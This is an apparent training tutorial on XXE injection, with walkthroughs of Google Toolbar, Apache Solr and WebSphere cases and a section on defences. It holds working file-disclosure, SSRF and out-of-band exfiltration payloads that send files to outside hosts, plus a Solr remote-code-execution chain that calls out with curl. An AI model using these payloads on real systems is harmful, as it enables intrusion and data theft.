XML External Entity Injection

Exploit XML Parsers to Access Files and Internal Networks

XXE Attacks | Entity Expansion | Out-of-Band Exploitation

What You'll Discover

🎯 Why This Matters

XML External Entity (XXE) injection remains a critical risk because applications still rely on XML for API communication, configuration files, and document processing. XXE vulnerabilities let attackers read local files, scan internal networks, and, in some configurations, achieve remote code execution through the XML parser. The risk is highest in enterprise environments, where XML is used extensively for SOAP APIs, document workflows, and data integration.

🔍 What You'll Learn

You'll learn how to identify XXE vulnerabilities in XML processing endpoints and exploit external entity references for file disclosure and SSRF attacks. This includes crafting malicious DTDs for out-of-band data exfiltration, exploiting blind XXE scenarios, and chaining XXE with other vulnerabilities. These are the same systematic techniques security experts use to assess XML-based applications and APIs.

🚀 Your First Win

In the next 15 minutes, you'll successfully exploit an XXE vulnerability to read sensitive system files from the server filesystem, demonstrating how seemingly harmless XML processing can lead to complete information disclosure and potential system compromise.

🔧 Try This Right Now

Test basic XXE exploitation against an XML processing endpoint

# Basic XXE payload for file disclosure
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

# Test on XML upload or API endpoint
POST /api/xml-processor HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/hostname">
]>
<data>&file;</data>

# Out-of-band XXE for blind scenarios
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://<attacker>/malicious.dtd">
%dtd;
]>
<data>&send;</data>

# Windows file access
<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">

You'll see: How XML parsers process external entities and potentially expose local files or make network requests on behalf of the server. This demonstrates why proper XML parsing configuration is critical for application security.

Skills You'll Master

✅ Core Understanding

  • XML parser behavior and entity processing
  • DTD (Document Type Definition) manipulation
  • External entity reference exploitation
  • Blind XXE detection and exploitation techniques

🔍 Expert Skills

  • Out-of-band data exfiltration methods
  • XXE chaining with SSRF and file inclusion
  • SOAP API and XML upload exploitation
  • Secure XML parsing implementation

Understanding XXE Vulnerabilities

XXE occurs when XML parsers process external entity references without proper security controls

XML External Entity vulnerabilities exist because of how XML parsers are designed to work. When you understand XML's architecture, you'll see why this vulnerability is so powerful and widespread in enterprise applications.

How XML Parsing Actually Works

XML documents can include Document Type Definitions (DTDs) that define the structure and rules for the document. These DTDs support "entities" - essentially variables that can hold text, numbers, or references to external resources. Think of entities as placeholders that the XML parser will replace with actual content when processing the document.

Here's the critical security issue: many XML parsers, particularly older libraries and some default configurations, will automatically fetch and process external entities unless that behavior is explicitly disabled. If an entity references a file path like file:///etc/passwd or a URL like http://internal-server/admin, such a parser will attempt to read that file or make that HTTP request on behalf of the application.

This behavior turns every XML processing endpoint into a potential file disclosure and server-side request forgery vulnerability. The XML specification was designed for legitimate use cases like including shared content or referencing external schemas, but attackers exploit this same functionality for malicious purposes.
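Parser defaults differ between libraries, so it is worth checking how a given one actually behaves. The sketch below uses Python's standard-library xml.etree.ElementTree as one example: an internal entity is expanded like a variable, while a reference to an external entity is refused with a parse error in current CPython releases. The entity names and the helper parse_text are illustrative assumptions, not part of any application discussed here.

```python
import xml.etree.ElementTree as ET

# Internal entity: the replacement text lives inside the document's own DTD.
INTERNAL = '<!DOCTYPE note [<!ENTITY author "Alice">]><note>&author;</note>'

# External entity: the replacement text would have to be fetched from a URI.
EXTERNAL = (
    '<!DOCTYPE note [<!ENTITY xxe SYSTEM "file:///etc/hostname">]>'
    "<note>&xxe;</note>"
)


def parse_text(xml_text: str) -> str:
    """Return the root element's text, or a marker if the parser refuses."""
    try:
        return ET.fromstring(xml_text).text or ""
    except ET.ParseError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    print(parse_text(INTERNAL))  # the entity is replaced by its declared value
    print(parse_text(EXTERNAL))  # ElementTree does not resolve external entities
```

A parser that is vulnerable to XXE would instead return the contents of the referenced file in the second case, which is exactly the behavior the test payloads in this guide probe for.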

Why XXE Is So Dangerous in Enterprise Environments

Enterprise applications extensively use XML for data exchange, configuration management, and API communications. SOAP web services, configuration imports, document processing systems, and data integration platforms all rely on XML parsing. Each of these represents a potential attack surface.

When you successfully exploit XXE, you're not just reading files - you're leveraging the application's own XML processing capabilities to perform actions that appear legitimate to security monitoring systems. The requests come from the application server itself, often bypassing network security controls and appearing in logs as normal application behavior.

This is why XXE has featured in serious data exposure and internal network compromise findings, and why it was listed as its own category in the OWASP Top 10 (2017). You're essentially turning the application into your proxy for accessing internal resources and sensitive data.

Common Entry Points

Where XXE vulnerabilities typically appear

SOAP API endpoints
XML file uploads
RSS/Atom feed processing
SVG image uploads
Office document processing
Configuration file imports

Attack Vectors

Methods used to exploit XXE

File disclosure attacks
SSRF via external entities
Denial of service (billion laughs)
Out-of-band data exfiltration
Blind XXE exploitation
Remote code execution
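
The billion laughs entry in the list above is an entity expansion attack rather than an external entity attack: each entity is defined as several references to the previous one, so the expanded size grows exponentially with nesting depth. A rough calculation, assuming the commonly quoted layout of a 3-byte base string and 9 nested levels of 10 references each (these figures are an assumption for illustration, not taken from this guide):

```python
def expanded_size(base_bytes: int, refs_per_level: int, levels: int) -> int:
    """Bytes produced when the outermost nested entity is fully expanded."""
    return base_bytes * refs_per_level ** levels


if __name__ == "__main__":
    size = expanded_size(base_bytes=3, refs_per_level=10, levels=9)
    print(f"{size:,} bytes")  # 3 * 10**9 bytes of expanded text
```

This is why parsers that allow DTDs usually also need limits on entity expansion depth and total expanded size.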

Impact Potential

What attackers can achieve

Source code disclosure
Configuration file theft
Internal network scanning
AWS metadata access
Database credential exposure
Privilege escalation

Tools and Techniques

Successful XXE exploitation combines understanding XML parser behavior with the right tools and methodologies. Security assessments rely on both automated detection capabilities and manual testing techniques to uncover the full scope of XXE vulnerabilities. You'll learn the industry-standard approach that security experts use daily.

The XXE Testing Methodology

Security professionals follow a systematic approach to XXE testing that progresses from discovery to exploitation. This methodology ensures comprehensive coverage and maximizes the chance of finding complex vulnerabilities that simple automated scans might miss.

Step 1: Reconnaissance - Identify all XML processing endpoints through HTTP request analysis, looking for Content-Type headers, file upload functionality, and API documentation that mentions XML support.

Step 2: Basic Detection - Test with simple entity references to confirm that the parser processes external entities. This establishes whether the vulnerability exists before attempting more complex exploitation.

Step 3: Exploitation Development - Craft targeted payloads based on the application technology stack, operating system, and specific files you want to access.

Step 4: Impact Assessment - Determine the full scope of access possible through the vulnerability, including file disclosure, SSRF capabilities, and potential for privilege escalation or remote code execution.
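
The reconnaissance step can be partly scripted when reviewing exported traffic. The sketch below flags requests that probably carry XML, based on the Content-Type header and a simple look at the body. The function name looks_like_xml and the list of media types are assumptions chosen for illustration; real traffic may need a broader list.

```python
# Media types that commonly indicate an XML body (illustrative, not exhaustive).
XML_MEDIA_TYPES = {"application/xml", "text/xml", "image/svg+xml"}


def looks_like_xml(content_type: str, body: bytes) -> bool:
    """Heuristically decide whether an HTTP request carries XML."""
    # Drop parameters such as "; charset=utf-8" before comparing.
    media_type = content_type.split(";", 1)[0].strip().lower()
    if media_type in XML_MEDIA_TYPES or media_type.endswith("+xml"):
        return True
    # Fall back to sniffing: some endpoints accept XML under a generic type.
    return body.lstrip().startswith(b"<?xml")


if __name__ == "__main__":
    print(looks_like_xml("text/xml; charset=utf-8", b"<a/>"))
    print(looks_like_xml("application/json", b'{"a": 1}'))
```

Endpoints that normally receive JSON are still worth a manual check, since some frameworks will parse XML if the Content-Type header is changed.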

Burp Suite: XXE Testing

Burp Suite is the tool most security teams reach for when testing XXE. Learning to use it effectively for XXE testing gives you the same workflow that professional penetration testers rely on in security assessments.

Why Burp Suite Excels at XXE Testing

Burp Suite provides several key advantages for XXE testing that make it the preferred choice of security experts. The platform integrates multiple testing approaches in a single interface, allowing you to seamlessly transition from discovery to exploitation to impact assessment.

Burp Proxy captures all HTTP traffic, letting you identify XML processing endpoints you might otherwise miss. Many applications use XML in unexpected places - form submissions, API calls, or file uploads - and Burp Proxy reveals these opportunities.

Burp Repeater enables precise payload crafting and testing. You can modify XML requests in real-time, test different entity references, and immediately see the results. This manual control is essential for understanding exactly how the target application processes XML.

Burp Collaborator solves the challenge of blind XXE testing. When applications don't directly display file contents in responses, Collaborator provides an out-of-band channel to confirm that external entities are being processed and to exfiltrate data.

Step-by-Step Burp Suite XXE Testing Workflow

# Step 1: Proxy Configuration and Traffic Capture
# Configure browser to use Burp Proxy (127.0.0.1:8080)
# Browse target application while Burp captures all requests
# Look for requests with Content-Type: application/xml or text/xml

# Step 2: Identify XML Processing Endpoints
# Review captured requests in Proxy history
# Search for XML content in request bodies
# Note endpoints that accept file uploads (potential XML file processing)

# Step 3: Basic XXE Detection in Burp Repeater
# Right-click captured XML request → Send to Repeater
# Modify the XML to include a simple external entity reference

POST /api/process HTTP/1.1
Host: <target>
Content-Type: application/xml
Content-Length: 154

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
  <user>&xxe;</user>
  <action>process</action>
</data>

# Step 4: Analyze Response for Direct File Disclosure
# Send request and examine response body
# Look for file contents in response (direct XXE)
# Check for error messages that might reveal file paths

# Step 5: Burp Collaborator for Blind XXE Testing
# Go to Burp Collaborator client → Copy to clipboard
# Create payload using Collaborator domain

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://abcd1234efgh.burpcollaborator.net/xxe.dtd">
%dtd;
]>
<data>&send;</data>

# Step 6: Monitor Collaborator Interactions
# Return to Collaborator client → Poll now
# Check for DNS lookups or HTTP requests
# Confirms that external entities are being processed

# Step 7: Data Exfiltration via Collaborator
# Host the malicious DTD on a server you control (Collaborator only records interactions)
# Use parameter entities to send file contents to the Collaborator domain

# Example DTD content for data exfiltration:
# %eval; declares the parameter entity "send"; %send; then triggers the request
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://abcd1234efgh.burpcollaborator.net/exfil?data=%file;'>">
%eval;
%send;

# Step 8: Automated Testing with Burp Scanner
# Right-click target → Scan
# Enable XXE-specific scan checks
# Review Scanner results for additional XXE vectors

Expert Tip: Burp Suite's integrated approach means you can discover XXE vulnerabilities through Proxy, exploit them manually in Repeater, confirm blind attacks with Collaborator, and scale testing with Scanner - all within the same platform that security experts use for enterprise assessments.

Manual XXE Testing Techniques

Manual testing techniques provide deeper understanding of XXE behavior and enable detection of complex vulnerabilities that automated tools might miss.

Systematic XXE Payload Testing

# Basic file disclosure test
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

# Windows system file access
<!ENTITY win SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">

# Application-specific file targeting
<!ENTITY config SYSTEM "file:///var/www/html/config.php">
<!ENTITY env SYSTEM "file:///.env">
<!ENTITY db SYSTEM "file:///opt/app/database.yml">

# PHP wrapper exploitation (if supported)
<!ENTITY php SYSTEM "php://filter/convert.base64-encode/resource=index.php">

# SSRF via XXE
<!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/">
<!ENTITY internal SYSTEM "http://internal-service:8080/admin">

# Out-of-band data exfiltration
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://hackerdna.xss.ht/xxe.dtd">
%dtd;
]>
<data>test</data>

# xxe.dtd content for data exfiltration:
# %eval; declares the parameter entity "send"; %send; then triggers the request.
# Parameter entities are only expanded inside the DTD, not in element content.
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://hackerdna.xss.ht/collect?data=%file;'>">
%eval;
%send;

Manual testing allows security experts to understand application behavior, test edge cases, and develop targeted exploitation strategies based on the specific XML implementation.

XXEinjector: Specialized Automation

XXEinjector is a specialized Ruby tool for automating XXE exploitation. While not as widely used as Burp Suite, it provides dedicated automation for complex XXE scenarios and advanced exploitation techniques.

XXEinjector Usage Examples

# Install XXEinjector
git clone https://github.com/enjoiz/XXEinjector.git
cd XXEinjector

# Save a valid HTTP request containing XML to a file.
# The XXEINJECT marker shows where the DTD should be injected.
echo 'POST /api/data HTTP/1.1
Host: <target>
Content-Type: application/xml

XXEINJECT' > request.txt

# Directory enumeration
# --host is your own IP address for reverse connections, not the target
ruby XXEinjector.rb --host=<your-ip> --path=/etc --file=request.txt

# Same enumeration against an HTTPS application
ruby XXEinjector.rb --host=<your-ip> --path=/etc --file=request.txt --ssl

# Out-of-band retrieval over HTTP instead of the default FTP channel
ruby XXEinjector.rb --host=<your-ip> --path=/etc --file=request.txt --oob=http

# Brute-force a list of file paths
ruby XXEinjector.rb --host=<your-ip> --brute=paths.txt --file=request.txt

# SOAP endpoint testing: save the SOAP request, including its SOAPAction
# header, as the request file and run the same commands

XXEinjector provides automation for complex scenarios but requires understanding of XXE fundamentals and should complement, not replace, manual testing techniques.

Real-World Attack Scenarios

These documented XXE vulnerabilities demonstrate how XML processing flaws have been exploited in real applications, showing the systematic approach that leads to significant discoveries and impact.

Google Toolbar Button Gallery XXE (2014)

Security researchers at Detectify discovered XXE vulnerabilities in Google's Toolbar Button Gallery that allowed reading internal files and performing SSRF attacks against Google's infrastructure. The technical details show systematic XXE exploitation against enterprise systems.

# Step 1: Identify Google Toolbar Button Gallery XML processing
# Google allowed users to submit custom toolbar buttons via XML
# Endpoint: Google Toolbar Button Gallery submission interface

# Step 2: Create malicious toolbar button XML with XXE
# Standard toolbar button format with embedded XXE payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE customButtons [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<customButtons>
  <button>
    <title>HackerDNA Button</title>
    <description>&xxe;</description>
    <url>http://hackerdna.com</url>
  </button>
</customButtons>

# Step 3: Advanced payload for Google infrastructure discovery
# Target Google-specific paths and configuration files
<?xml version="1.0"?>
<!DOCTYPE customButtons [
<!ENTITY passwd SYSTEM "file:///etc/passwd">
<!ENTITY hosts SYSTEM "file:///etc/hosts">
<!ENTITY resolv SYSTEM "file:///etc/resolv.conf">
]>
<customButtons>
  <button>
    <title>System Info</title>
    <description>&passwd;</description>
    <tooltip>&hosts;</tooltip>
  </button>
</customButtons>

# Step 4: SSRF exploitation through XXE
# Use XXE to probe internal Google services
<!ENTITY ssrf SYSTEM "http://metadata.google.internal/computeMetadata/v1/">
<!ENTITY internal SYSTEM "http://169.254.169.254/latest/meta-data/">

# Step 5: Out-of-band data exfiltration
# For scenarios where direct response isn't available
<?xml version="1.0"?>
<!DOCTYPE customButtons [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://hackerdna.xss.ht/google.dtd">
%dtd;
]>
<customButtons>
  <button>
    <title>OOB Test</title>
  </button>
</customButtons>

# google.dtd content:
# %send; must be invoked inside the DTD; parameter entities are not expanded in element content
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://hackerdna.xss.ht/exfil?data=%file;'>">
%eval;
%send;

Impact Assessment: The vulnerability allowed reading sensitive configuration files from Google's production servers and performing internal network reconnaissance. Google quickly patched the issue and implemented comprehensive XXE protections across their XML processing infrastructure.

Apache Solr XXE to RCE (CVE-2017-12629)

Apache Solr's XML parsing functionality contained XXE vulnerabilities that could be chained to achieve remote code execution. CVE-2017-12629 demonstrates escalation from XXE to full system compromise through application-specific features.

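# Step 1: Identify Solr XML processing endpoint
# Apache Solr accepts XML documents for indexing and XML-structured queries
# Affected versions per the CVE entry: Apache Solr before 7.1
# The advisory places the XXE in the XML query parser (defType=xmlparser);
# the update-handler request below is a simplified illustration
# Endpoint: http://<target>:8983/solr/<core>/update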

# Step 2: Basic XXE for file disclosure
POST /solr/demo/update HTTP/1.1
Host: <target>:8983
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<add>
<doc>
<field name="id">&xxe;</field>
<field name="title">XXE Test</field>
</doc>
</add>

# Step 3: Advanced XXE for Solr configuration access
# Target Solr-specific configuration and log files
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY config SYSTEM "file:///opt/solr/server/solr/configsets/_default/conf/solrconfig.xml">
<!ENTITY schema SYSTEM "file:///opt/solr/server/solr/demo/conf/schema.xml">
<!ENTITY logs SYSTEM "file:///opt/solr/server/logs/solr.log">
]>
<add>
<doc>
<field name="id">config_disclosure</field>
<field name="config">&config;</field>
<field name="schema">&schema;</field>
</doc>
</add>

# Step 4: Escalation to RCE via configuration manipulation
# The documented chain uses the Config API add-listener command to register
# solr.RunExecutableListener, which runs a command on a commit event
POST /solr/demo/config HTTP/1.1
Content-Type: application/json

{
  "add-listener": {
    "event": "postCommit",
    "name": "hdna-rce",
    "class": "solr.RunExecutableListener",
    "exe": "/bin/bash",
    "args": ["-c", "curl http://hackerdna.com/callback?data=$(whoami)"]
  }
}

# Step 5: Trigger the listener with an update that commits
POST /solr/demo/update?commit=true HTTP/1.1
Content-Type: application/xml

<add><doc><field name="id">rce-test</field></doc></add>

# Result: Remote code execution achieved by chaining XXE
# with Solr configuration manipulation

CVE Impact: CVE-2017-12629 affected thousands of Apache Solr installations worldwide. The vulnerability demonstrated how XXE can be chained with application-specific features to achieve remote code execution, leading to complete system compromise. Apache released patches and security guidelines to address this critical issue.

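IBM WebSphere SOAP Endpoint XXE (Illustrative Scenario)

Enterprise application servers such as IBM WebSphere Application Server host SOAP web services whose XML processing can be vulnerable to XXE, allowing attackers to read arbitrary files from the server. Note that CVE-2018-1567, which affects WebSphere 7.0, 8.0, 8.5, and 9.0, is documented by IBM as remote code execution through the SOAP connector using untrusted serialized objects, not as XXE. The walkthrough below is therefore a generic XXE scenario against a WebSphere-hosted web service rather than a reproduction of that CVE.

# Step 1: Identify WebSphere web service endpoint
# IBM WebSphere processes SOAP and REST requests with XML
# Whether a service is affected depends on how it configures its XML parser
# Endpoint: /AppName/services/ServiceName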

# Step 2: Craft malicious SOAP request with XXE
POST /MyApp/services/DataProcessor HTTP/1.1
Host: <target>:9080
Content-Type: text/xml; charset=utf-8
SOAPAction: "processData"

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header/>
  <soapenv:Body>
    <ns:processData xmlns:ns="http://hackerdna.com/webservice">
      <ns:input>&xxe;</ns:input>
    </ns:processData>
  </soapenv:Body>
</soapenv:Envelope>

# Step 3: Target WebSphere-specific configuration files
<!ENTITY config SYSTEM "file:///opt/IBM/WebSphere/AppServer/profiles/AppSrv01/config/cells/Node01Cell/nodes/Node01/servers/server1/server.xml">
<!ENTITY security SYSTEM "file:///opt/IBM/WebSphere/AppServer/profiles/AppSrv01/config/cells/Node01Cell/security.xml">
<!ENTITY logs SYSTEM "file:///opt/IBM/WebSphere/AppServer/profiles/AppSrv01/logs/server1/SystemOut.log">

# Step 4: Exploit for sensitive data disclosure
<?xml version="1.0"?>
<!DOCTYPE soapenv:Envelope [
<!ENTITY wsconfig SYSTEM "file:///opt/IBM/WebSphere/AppServer/profiles/AppSrv01/config/cells/Node01Cell/applications/MyApp.ear/deployments/MyApp/META-INF/application.xml">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <ns:getData xmlns:ns="http://hackerdna.com/webservice">
      <ns:config>&wsconfig;</ns:config>
    </ns:getData>
  </soapenv:Body>
</soapenv:Envelope>

# Step 5: Out-of-band exfiltration for blind scenarios
# websphere.dtd must declare and then invoke %send; itself, because
# parameter entities are not expanded in element content
<?xml version="1.0"?>
<!DOCTYPE soapenv:Envelope [
<!ENTITY % file SYSTEM "file:///opt/IBM/WebSphere/AppServer/profiles/AppSrv01/config/cells/Node01Cell/security.xml">
<!ENTITY % dtd SYSTEM "http://hackerdna.xss.ht/websphere.dtd">
%dtd;
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <ns:probe xmlns:ns="http://hackerdna.com/webservice">test</ns:probe>
  </soapenv:Body>
</soapenv:Envelope>

Enterprise Impact: XXE in an application server's web service stack can expose sensitive configuration data and application secrets across enterprise deployments. Applying vendor security updates and disabling external entity processing in XML parsers are the primary mitigations.
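
Disabling external entity processing usually comes down to a few parser feature flags. As a minimal sketch, the example below uses Python's standard-library xml.sax and switches off external general and parameter entities explicitly, rather than relying on the defaults of a particular Python version. The TextCollector class and collect_text helper are hypothetical names for illustration; other languages expose equivalent settings under different names.

```python
import io
import xml.sax
from xml.sax.handler import (
    ContentHandler,
    feature_external_ges,
    feature_external_pes,
)


class TextCollector(ContentHandler):
    """Collects all character data seen while parsing."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def collect_text(xml_bytes: bytes) -> str:
    """Parse XML with external entity loading switched off."""
    parser = xml.sax.make_parser()
    # Do not fetch external general entities (file://, http:// and so on).
    parser.setFeature(feature_external_ges, False)
    # Do not fetch external parameter entities or external DTD subsets.
    parser.setFeature(feature_external_pes, False)
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.chunks)


if __name__ == "__main__":
    doc = (
        b'<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/hostname">]>'
        b"<r>before &x; after</r>"
    )
    print(repr(collect_text(doc)))  # the external entity is not loaded
```

Setting the flags explicitly documents the intent in code and protects against a later change of parser or runtime version.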

Defensive Countermeasures

Protecting applications from XXE attacks requires implementing multiple layers of defense that work together to prevent external entity processing and limit potential attack impact. These industry-proven strategies form the foundation of secure XML handling in production environments.

Primary Defense: Disable External Entity Processing

The most effective XXE protection is completely disabling DTD processing and external entity resolution in XML parsers. This approach eliminates the root cause by preventing the parser from processing any external entity references, regardless of their source or destination.

  • Disable DTD processing entirely - Configure XML parsers to reject any document containing DTD declarations
  • Block external entity resolution - Prevent parsers from fetching content from external URLs or file paths
  • Disable parameter entity expansion - Block processing of parameter entities that enable complex XXE attacks
  • Remove XInclude support - Disable XInclude functionality that can bypass external entity restrictions
  • Enforce secure defaults - Ensure all XML processing components use secure configurations by default
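
The first item in the list above, rejecting any document that contains a DTD, can be sketched with Python's standard library alone. The example runs a strict pre-check with xml.parsers.expat that raises as soon as a DOCTYPE declaration starts, and only then builds the tree. The names DoctypeForbidden and parse_without_dtd are assumptions for illustration; in production a maintained hardening library is usually a better choice than hand-rolled checks.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when a document carries a DOCTYPE declaration."""


def parse_without_dtd(data: bytes) -> ET.Element:
    """Parse XML, refusing any document that declares a DTD."""

    def reject(name, system_id, public_id, has_internal_subset):
        # Called by expat when a DOCTYPE declaration begins.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = reject
    checker.Parse(data, True)  # raises before any entity is processed
    return ET.fromstring(data)


if __name__ == "__main__":
    print(parse_without_dtd(b"<order><id>42</id></order>").tag)
    try:
        parse_without_dtd(b'<!DOCTYPE r [<!ENTITY x "y">]><r>&x;</r>')
    except DoctypeForbidden as exc:
        print("blocked:", exc)
```

Because no entity can be declared without a DTD, this single rule covers external entities, parameter entities, and entity expansion attacks at once, at the cost of rejecting legitimate documents that rely on DTDs.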

Implementation Strategies

Successful XXE prevention requires systematic implementation across all XML processing components and consistent application of security policies throughout the development lifecycle.

  • Centralized XML parsing libraries - Use a single, well-configured XML parsing component across the entire application
  • Input validation and sanitization - Validate XML structure and reject documents containing suspicious patterns
  • Regular library updates - Keep XML parsing libraries updated to latest versions with security patches
  • Configuration management - Maintain secure XML parser configurations through automated deployment processes
  • Developer training and guidelines - Ensure development teams understand XXE risks and secure coding practices
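
For the input validation item above, a simple pattern scan can flag suspicious documents for rejection or logging. The sketch below is an assumption-laden illustration: the indicator names and the find_xxe_indicators helper are hypothetical, and byte patterns like these can be bypassed with alternative encodings such as UTF-16, so they complement secure parser configuration rather than replace it.

```python
import re

# Byte patterns that suggest DTD or external entity use (illustrative only).
INDICATORS = {
    "doctype": re.compile(rb"<!DOCTYPE"),
    "entity": re.compile(rb"<!ENTITY"),
    "external-id": re.compile(rb"\b(SYSTEM|PUBLIC)\s+[\"']"),
    "xinclude": re.compile(rb"http://www\.w3\.org/2001/XInclude"),
}


def find_xxe_indicators(body: bytes) -> list[str]:
    """Return the names of all indicators found in a request body."""
    return [name for name, pattern in INDICATORS.items() if pattern.search(body)]


if __name__ == "__main__":
    payload = b'<!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>'
    print(find_xxe_indicators(payload))
    print(find_xxe_indicators(b"<r>hello</r>"))
```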

Defense in Depth Approaches

Multiple security layers provide comprehensive protection against XXE attacks, ensuring that if one defense mechanism fails, others continue to provide protection against potential exploitation attempts.

  • Network egress filtering - Block outbound connections from application servers to prevent out-of-band data exfiltration
  • File system access controls - Use containerization, chroot jails, or least-privilege principles to limit file system access
  • Cloud metadata protection - Block access to cloud metadata services at the network level (169.254.169.254)
  • Internal network segmentation - Isolate XML processing systems from sensitive internal resources and databases
  • Monitoring and detection - Implement logging and alerting for unusual XML processing patterns and external requests
  • Application firewalls - Deploy WAF rules to detect and block XXE attack patterns in HTTP requests
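
The egress and metadata rules above are best enforced at the network layer, but the same policy can be expressed in code for any component that legitimately fetches URLs on the application's behalf. The sketch below, with the hypothetical helper is_blocked_destination, rejects non-HTTP schemes and IP literals in private, loopback, or link-local ranges (which include 169.254.169.254). It deliberately does not resolve hostnames, so it is only a first filter under that stated assumption.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def is_blocked_destination(url: str) -> bool:
    """Return True if a URL should not be fetched by the application."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return True  # file://, ftp://, php:// and similar schemes
    host = parts.hostname
    if host is None:
        return True
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        # A hostname rather than an IP literal; not resolved in this sketch.
        return False
    return address.is_private or address.is_loopback or address.is_link_local


if __name__ == "__main__":
    for candidate in (
        "file:///etc/passwd",
        "http://169.254.169.254/latest/meta-data/",
        "https://example.com/schema.dtd",
    ):
        print(candidate, is_blocked_destination(candidate))
```

A complete filter would also resolve hostnames and re-check the resulting addresses, since an attacker-controlled DNS name can point at an internal address.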

🎯 You've Got XXE Down!

You now understand how to exploit XML parsers to access files and internal networks through XML External Entity injection. You can craft malicious DTDs, perform out-of-band data exfiltration, and chain XXE with other vulnerabilities using the same systematic techniques that security experts use to assess XML-based applications and APIs.

XXE Exploitation | Entity Processing | Out-of-Band Attacks | File Disclosure | Secure XML Parsing
